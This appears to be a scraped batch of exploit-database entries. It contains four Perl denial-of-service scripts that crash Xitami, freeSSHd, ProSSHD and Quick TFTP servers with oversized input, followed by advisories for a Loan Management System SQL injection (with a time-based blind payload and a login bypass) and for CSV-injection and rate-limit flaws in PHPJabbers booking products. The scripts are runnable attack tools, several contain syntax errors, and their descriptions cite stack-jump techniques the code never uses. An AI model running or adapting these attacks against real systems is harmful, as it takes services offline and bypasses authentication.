<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Xitami 2.5 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 14 january 2024<br /># Vendor Homepage: https://imatix-legacy.github.io/xitami.com/<br /># Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Xitami 2.5 <br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=tutFcL3Gh8I<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data to webserver.<br />#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br /> $exploit = "A"*939;<br /><br />if ($socket = IO::Socket::INET->new<br /> (PeerAddr => $ip,<br /> PeerPort => $port, <br /> Proto => "TCP"))<br /> <br /> { <br /> $header =<br /> "GET / HTTP/1.1\r\n".<br /> "Host: ".$target." \r\n".<br /> "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";<br /><br /> print $socket $header."\r\n";<br /> sleep(1);<br /> close($socket);<br /> }<br /><br />else<br /> {<br /> print "[-] Connection to $target failed!\n";<br /> } <br /> <br /><br /><br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /><br /> _________<br /> | |<br /> | Exploit |==( ) //////<br /> |_________| ||| | o o| <br /> ||| ( c ) ____<br /> ||| \= / || \_<br /> |||||| || |<br /> |||||| ...||__/|-"<br /> |||||| __|________|__<br /> ||| |______________|<br /> ||| || || || ||<br /> ||| || || || ||<br /> ------------|||-------------||-||------||-||-------<br /> |__> || || || || <br /> <br /> [+] Xitami 2.5 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 13 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: <br /># Notification vendor: No reported<br /># Tested Version: freeSSHd 1.0.9 - Denial of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: <br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The SSH does not correctly handle the amount of data or bytes sent.<br />#When authenticating to the SSH with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br />my $bufff =<br /> "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18;<br /><br /><br /> my $payload =<br /> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" .<br /> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" .<br /> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067);<br /><br /> $payload .= $payload;<br /> $payload .= "C" x 19021 . "\r\n";<br /><br />my $i=0;<br />while ($i<=18) {<br /> my $sock = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br /> ) or die "Cannot connect!\n";<br /><br /> if (<$sock> eq '') {<br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> exit;<br /> }<br /><br /> $sock->send($payload) or die "Exploited successuful!!!";<br /><br />$i++;<br />}<br /><br /><br /><br /> <br /> sub intro {<br /> print q {<br /><br /><br /> _/| <br /> // o\ <br /> || ._) <br /> //__\ <br /> )___( <br /><br /> [+] freeSSHd 1.0.9 - Denied of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use Net::SSH2<br /><br /># Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 13 january 2024<br /># Vendor Homepage: https://prosshd.com/<br /># Notification vendor: No reported<br /># Tested Version: ProSSHD 1.2 20090726<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data to SSH.<br />#The following request sends a large amount of data to the SSH to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {s<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br />my $i=0;<br /> print "\t ==> Exploiting... \n\n";<br /><br />my $payload = "\x41" x 500;<br /><br />$connection2 = Net::SSH2->new();<br />$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";<br />$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";<br />$scpget = $connection2->scp_get($payload);<br />$connection2->disconnect();<br /><br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port, $username, $password) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> <username> <password> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 12 january 2024<br /># Vendor Homepage: https://www.tallsoft.com/<br /># Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Quick TFTP Server Pro 2.1<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=yz7_ImFYueA<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data to TFTP.<br />#The following request sends a large amount of data to the TFTP to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br />my $filename = "exploit";<br /><br />$shell = "A"x317;<br /><br />my $mode = "A" x 1360;<br /><br />my $muha = "\x00\x02" .$filename . "\x00" .$mode;<br /><br />socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";<br />send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!"; <br /><br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /><br /> _________<br /> | |<br /> | Exploit |==( ) //////<br /> |_________| ||| | o o| <br /> ||| ( c ) ____<br /> ||| \= / || \_<br /> |||||| || |<br /> |||||| ...||__/|-"<br /> |||||| __|________|__<br /> ||| |______________|<br /> ||| || || || ||<br /> ||| || || || ||<br /> ------------|||-------------||-||------||-||-------<br /> |__> || || || || <br /> <br /> [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /><br /></code></pre>
<pre><code>## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 01/12/2024<br />## Vendor: https://twitter.com/razormist<br />## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `password` parameter is vulnerable to SQL injection attacks. The<br />payload ' was submitted in the password parameter, and a database<br />error message was returned. Also, the attacker can bypass the login<br />form and log in to the system as an administrator using this<br />vulnerability SQLi bypass authentication.<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: password (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282<br />FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/shared-asset-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51324<br /><br />Descriptions:<br />PHPJabbers Shared Asset Booking System v1.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51324)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Shared Asset Booking System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/shared-asset-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51323<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Shared Asset Booking System v1.0 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704802212_666/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51323)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Night Club Booking Software v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/night-club-booking-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51321<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Night Club Booking Software v1.0 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704802212_666/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51321)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Night Club Booking Software v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/night-club-booking-software/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51320<br /><br />Descriptions:<br />PHPJabbers Night Club Booking Software v1.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51320)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System v1.1 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/#sectionDemo<br /># Version: v1.1<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51319<br /><br />Descriptions:<br />PHPJabbers Bus Reservation System v1.1 is vulnerable to CSV injection<br />vulnerability which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51319)<br /></code></pre>